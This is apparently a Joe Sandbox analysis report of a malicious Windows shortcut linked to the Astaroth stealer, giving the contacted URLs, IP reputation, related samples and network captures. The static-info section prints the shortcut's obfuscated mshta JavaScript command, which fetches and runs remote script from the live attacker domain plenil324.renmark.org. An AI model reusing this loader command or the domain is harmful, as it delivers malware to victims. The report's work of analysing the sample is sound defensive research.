        https://www.google.com/intl/en/about/products?tab=whmshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
          		unknown
          https://www.google.com.brmshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://plenil324.renmark.org/mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://csp.withgoogle.com/csp/gws/other-hpmshta.exe, 00000001.00000002.1696878826.000001C178373000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694182574.000001C17837D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B975885000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696074559.000001B97588A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C178380000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696538335.000001B97588B000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://drive.google.com/?tab=womshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                		unknown
                https://www.google.com.br/AGKbmshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  hTtpS://plenil324.renmark.org/?5/mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1695505386.000001C17827D000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://www.google.com.br/imghp?hl=en&tab=wimshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                      		unknown
                      https://news.google.com/?tab=wnmshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                        		unknown
                        https://mail.google.com/mail/?tab=wmmshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                          		unknown
                          http://schema.org/WebPagemshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.youtube.com/?tab=w1mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                            		unknown
                            https://plenil324.renmark.org/?5/smshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.google.com.br/setprefs?sig=0_1xoWnLa32iKp4MY2y_e7W7aV5SQ%3D&amp;hl=pt-BR&amp;source=homemshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                                		unknown
                                https://plenil324.renmark.org/omshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://maps.google.com/maps?hl=en&tab=wlmshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                                    		unknown
                                    http://www.google.com/history/optout?hl=enmshta.exe, 00000001.00000003.1694050768.000001C1783D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                                      		unknown
                                      https://plenil324.renmark.org/?5/.mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://plenil324.renmark.org/?5/lFmshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://www.google.com.br/4mshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://plenil324.renmark.org/?5/Xmshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://www.google.com.br/IGSbmshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                188.114.96.3
                                                		plenil324.renmark.orgEuropean Union
                                                		13335CLOUDFLARENETUStrue
                                                142.250.138.94
                                                		unknownUnited States
                                                		15169GOOGLEUSfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1546603
                                                Start date and time:2024-11-01 08:27:10 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 3m 55s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:7
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:V323904LY3.lNK.lnk
                                                Detection:MAL
                                                Classification:mal64.winLNK@1/1@2/2
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 1
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .lnk

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target mshta.exe, PID 5744 because there are no executed function
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                188.114.96.3NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                • www.timizoasisey.shop/3p0l/
                                                FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                • www.bayarcepat19.click/5hcm/
                                                greenthingswithgreatnewsforgetmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                • paste.ee/d/sTNna
                                                Lana_Rhoades_Photoos.jsGet hashmaliciousUnknownBrowse
                                                • paste.ee/d/ciuNW
                                                PO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.launchdreamidea.xyz/2b9b/
                                                VfKk5EmvwW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 083098cm.n9shteam.in/vmBase.php
                                                Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • filetransfer.io/data-package/CEqTVkxM/download
                                                0JLWNg4Sz1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 977255cm.nyashkoon.in/secureWindows.php
                                                zxalphamn.docGet hashmaliciousLokibotBrowse
                                                • touxzw.ir/alpha2/five/fre.php
                                                QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • filetransfer.io/data-package/jI82Ms6K/download

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUShttps://send-space.s3.eu-north-1.amazonaws.com/de.htmlGet hashmaliciousUnknownBrowse
                                                • 104.22.75.171
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 188.114.96.3
                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                • 188.114.96.3
                                                ICBM.exeGet hashmaliciousXmrigBrowse
                                                • 104.26.9.242
                                                SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeGet hashmaliciousXmrigBrowse
                                                • 162.159.135.233
                                                ICBM.exeGet hashmaliciousXmrigBrowse
                                                • 104.26.9.242
                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                • 188.114.96.3
                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                • 188.114.97.3
                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                • 188.114.96.3
                                                2Lzx7LMDWV.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.96.3

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                37f463bf4616ecd445d4a1937da06e19PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 142.250.138.94
                                                • 188.114.96.3
                                                PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 142.250.138.94
                                                • 188.114.96.3
                                                oZ7nac01Em.exeGet hashmaliciousStealc, VidarBrowse
                                                • 142.250.138.94
                                                • 188.114.96.3
                                                SecuriteInfo.com.FileRepMalware.6479.21607.exeGet hashmaliciousUnknownBrowse
                                                • 142.250.138.94
                                                • 188.114.96.3
                                                WGo3ga1AL9.exeGet hashmaliciousStealc, VidarBrowse
                                                • 142.250.138.94
                                                • 188.114.96.3
                                                FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 142.250.138.94
                                                • 188.114.96.3
                                                FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 142.250.138.94
                                                • 188.114.96.3
                                                PO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 142.250.138.94
                                                • 188.114.96.3
                                                Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 142.250.138.94
                                                • 188.114.96.3
                                                Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 142.250.138.94
                                                • 188.114.96.3

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OY4DPIF3.htm

                                                Download File
                                                Process:C:\Windows\System32\mshta.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3822)
                                                Category:dropped
                                                Size (bytes):21616
                                                Entropy (8bit):5.759193275884719
                                                Encrypted:false
                                                SSDEEP:384:ucT4FSspa1ocyXNA4lbGaXUzhhbRCKeFyY2b7nBY0CO/nKi1xCejiw:u7E1ocydvEaChbYKeknBY0CO/JxPiw
                                                MD5:03EA95BE9108347432B61E619F13435F
                                                SHA1:5272A310AAE922F0EDFB8E4564CB695B386F63A1
                                                SHA-256:27EA46A4390F2C74BC5F811971332BD0CAA34F5E4EFF79A67FCD80B19B15D21C
                                                SHA-512:C2AE74DE88D75639BD48454C962FD48A28F05CAB87044E38D9A78228778D124E6D7DB690C1156F6F1FDC3711A2C5566A4098D69F2E144B8D5D56B5A21FE80B8F
                                                Malicious:false
                                                Reputation:low
                                                Preview:<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="IE=edge" http-equiv="X-UA-Compatible"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="RXNHAXUkhkvUFFm7j6blOQ">(function(){var _g={kEI:'A4MkZ9HzDOaLwbkP5ue5gAI',kEXPI:'0,3700340,609,435,541533,2891,8348,71100,27868,162437,23024,6700,126319,8155,23350,6431,2,16003,5608,4171,62657,36747,3801,2412,33249,15816,1804,7734,18098,9436,11814,1634,13494,15783,27083,5203198,10498,396,134,5991956,2840026,1088,240,17,67,1,79,32,14,30,2,32,1,7,13,8,25,1,6,1,6,

                                                Static File Info

                                                General

                                                File type:MS Windows shortcut, Item id list present, Has command line arguments, Archive, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                Entropy (8bit):7.415977714569129
                                                TrID:
                                                • Windows Shortcut (20020/1) 100.00%
                                                File name:V323904LY3.lNK.lnk
                                                File size:1'544 bytes
                                                MD5:2e4c1c46c2c57baf20ef148ec89e47a2
                                                SHA1:2823f47f3da40c531b538c8edc037c93325dabc5
                                                SHA256:8c787fa0ec9be5bf076e6c25682a7926aa188a5b9378066008785f165765bc34
                                                SHA512:9d37c734f35db08e81c2d4ea627eab169a4cde0b9d18f5b8833d2e339d86978412598df4c2e95fbe5b1c29bcd30df99dc24ca985c0eeb90aee11330b76479bbe
                                                SSDEEP:24:8rBJlA3aMz9FkHqt0VGCZaDzCHbK8E/LWPItbrUUkVCc04xlpRS6jityJfXWK/DQ:8VJa3fz9W3Z6m77E/LTxTcZvuYJfmGDQ
                                                TLSH:A531E9B47AE0B417F2AE6BF21D0227D6E73116922EDE68C74DD02C98142810EDE84FD8
                                                File Content Preview:L..................F!... ...................................................]....P.O. .:i.....+00.../C:\......................+.2...........Windows\System32\conhOst.exe...[. C:\Windows\System32\MShTa "jAvasCRipT:try{try{var _10xlBOKJ=['\x44\x55\x44\x52\67

                                                File Icon

                                                Icon Hash:85c6c7ce8f896105

                                                Static Windows Shortcut Info

                                                General

                                                Relative Path:
                                                Command Line Argument: C:\Windows\System32\MShTa "jAvasCRipT:try{try{var _10xlBOKJ=['\x44\x55\x44\x52\67\116\x39','\x73\143\162\151\x70\164\x3a\x68\x54\x74\x70\x53\x3a\x2f\x2f\160\x6c\x65\156\x69\154\x33\x32\64\x2e\x72\x65\x6e\155\x61\x72\153\56\x6f\x72\147\x2f\77\65\57'];GetObject(_10xlBOKJ[1])[_10xlBOKJ[0]]();}catch(e){}}catch(e){}close()" >nul 2>&1 >nul 2>&1&&exit
                                                Icon location:

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-11-01T08:28:01.896363+01002851288ETPRO MALWARE Astaroth Stealer Activity (GET)1192.168.2.449730188.114.96.3443TCP
                                                2024-11-01T08:28:19.648837+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.462820TCP
                                                2024-11-01T08:28:58.464126+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.462826TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 1, 2024 08:28:00.884141922 CET49730443192.168.2.4188.114.96.3
                                                Nov 1, 2024 08:28:00.884212017 CET44349730188.114.96.3192.168.2.4
                                                Nov 1, 2024 08:28:00.884291887 CET49730443192.168.2.4188.114.96.3
                                                Nov 1, 2024 08:28:00.930769920 CET49730443192.168.2.4188.114.96.3
                                                Nov 1, 2024 08:28:00.930826902 CET44349730188.114.96.3192.168.2.4
                                                Nov 1, 2024 08:28:01.550029993 CET44349730188.114.96.3192.168.2.4
                                                Nov 1, 2024 08:28:01.550129890 CET49730443192.168.2.4188.114.96.3
                                                Nov 1, 2024 08:28:01.623837948 CET49730443192.168.2.4188.114.96.3
                                                Nov 1, 2024 08:28:01.623925924 CET44349730188.114.96.3192.168.2.4
                                                Nov 1, 2024 08:28:01.624495029 CET44349730188.114.96.3192.168.2.4
                                                Nov 1, 2024 08:28:01.624562979 CET49730443192.168.2.4188.114.96.3
                                                Nov 1, 2024 08:28:01.636935949 CET49730443192.168.2.4188.114.96.3
                                                Nov 1, 2024 08:28:01.679347992 CET44349730188.114.96.3192.168.2.4
                                                Nov 1, 2024 08:28:01.896392107 CET44349730188.114.96.3192.168.2.4
                                                Nov 1, 2024 08:28:01.896466017 CET49730443192.168.2.4188.114.96.3
                                                Nov 1, 2024 08:28:01.896483898 CET44349730188.114.96.3192.168.2.4
                                                Nov 1, 2024 08:28:01.896527052 CET49730443192.168.2.4188.114.96.3
                                                Nov 1, 2024 08:28:01.898447990 CET49730443192.168.2.4188.114.96.3
                                                Nov 1, 2024 08:28:01.898475885 CET44349730188.114.96.3192.168.2.4
                                                Nov 1, 2024 08:28:02.515331984 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:02.515377998 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:02.515444040 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:02.518032074 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:02.518047094 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.124272108 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.124339104 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.128757000 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.128768921 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.128984928 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.129141092 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.129391909 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.171343088 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.323337078 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.323419094 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.323498964 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.323546886 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.323565006 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.323565006 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.323585033 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.323595047 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.323596001 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.323605061 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.323616028 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.323637962 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.323648930 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.323679924 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.323689938 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.323724985 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.323733091 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.323801994 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.324131012 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.324202061 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.439657927 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.439730883 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.439747095 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.439784050 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.439789057 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.439795971 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.439817905 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.439841986 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.439845085 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.439856052 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.439874887 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.439897060 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.439901114 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.439937115 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.439943075 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.439985037 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.440311909 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.440351009 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.440359116 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.440402031 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.440424919 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.440444946 CET44362814142.250.138.94192.168.2.4
                                                Nov 1, 2024 08:28:03.440455914 CET62814443192.168.2.4142.250.138.94
                                                Nov 1, 2024 08:28:03.440489054 CET62814443192.168.2.4142.250.138.94

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 1, 2024 08:28:00.852899075 CET5861853192.168.2.41.1.1.1
                                                Nov 1, 2024 08:28:00.878838062 CET53586181.1.1.1192.168.2.4
                                                Nov 1, 2024 08:28:01.899667978 CET6343553192.168.2.41.1.1.1
                                                Nov 1, 2024 08:28:01.906687975 CET53634351.1.1.1192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Nov 1, 2024 08:28:00.852899075 CET192.168.2.41.1.1.10xf53aStandard query (0)plenil324.renmark.orgA (IP address)IN (0x0001)false
                                                Nov 1, 2024 08:28:01.899667978 CET192.168.2.41.1.1.10x4557Standard query (0)www.google.com.brA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Nov 1, 2024 08:28:00.878838062 CET1.1.1.1192.168.2.40xf53aNo error (0)plenil324.renmark.org188.114.96.3A (IP address)IN (0x0001)false
                                                Nov 1, 2024 08:28:00.878838062 CET1.1.1.1192.168.2.40xf53aNo error (0)plenil324.renmark.org188.114.97.3A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • plenil324.renmark.org
                                                • www.google.com.br

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449730188.114.96.34435744C:\Windows\System32\mshta.exe
                                                TimestampBytes transferredDirectionData
                                                2024-11-01 07:28:01 UTC304OUTGET /?5/ HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                Host: plenil324.renmark.org
                                                Connection: Keep-Alive
                                                2024-11-01 07:28:01 UTC1010INHTTP/1.1 302 Found
                                                Date: Fri, 01 Nov 2024 07:28:01 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: PHPSESSID=08qn5v45t37ij9q7197vaf3gq4; path=/
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                Access-Control-Allow-Origin: *
                                                Location: https://www.google.com.br
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=91Kdv4SCYBTaa7K3XOH9SZzUMTQNnVipg%2FCg6DxQPhF%2FrxVoQskQcONy0WhT3Eq0uONflstTCbcKxqAFEtLwcUy%2Fs0OzANHyOqdeLsuHWCIthF0Hn3Oyd3uYrdEZLkdKVUpIGjg5EkA%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8dba2a6aab664612-DFW
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1997&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=886&delivery_rate=1486652&cwnd=238&unsent_bytes=0&cid=8bdc0c606b970e76&ts=363&x=0"
                                                2024-11-01 07:28:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.462814142.250.138.944435744C:\Windows\System32\mshta.exe
                                                TimestampBytes transferredDirectionData
                                                2024-11-01 07:28:03 UTC297OUTGET / HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                Connection: Keep-Alive
                                                Host: www.google.com.br
                                                2024-11-01 07:28:03 UTC1185INHTTP/1.1 200 OK
                                                Date: Fri, 01 Nov 2024 07:28:03 GMT
                                                Expires: -1
                                                Cache-Control: private, max-age=0
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-RXNHAXUkhkvUFFm7j6blOQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                Server: gws
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                Set-Cookie: AEC=AVYB7cpkINnLfw942XggvVEzFjh8xz-KfkZ2sMo67_OCiq3tkTjyPJG3Sg; expires=Wed, 30-Apr-2025 07:28:03 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax
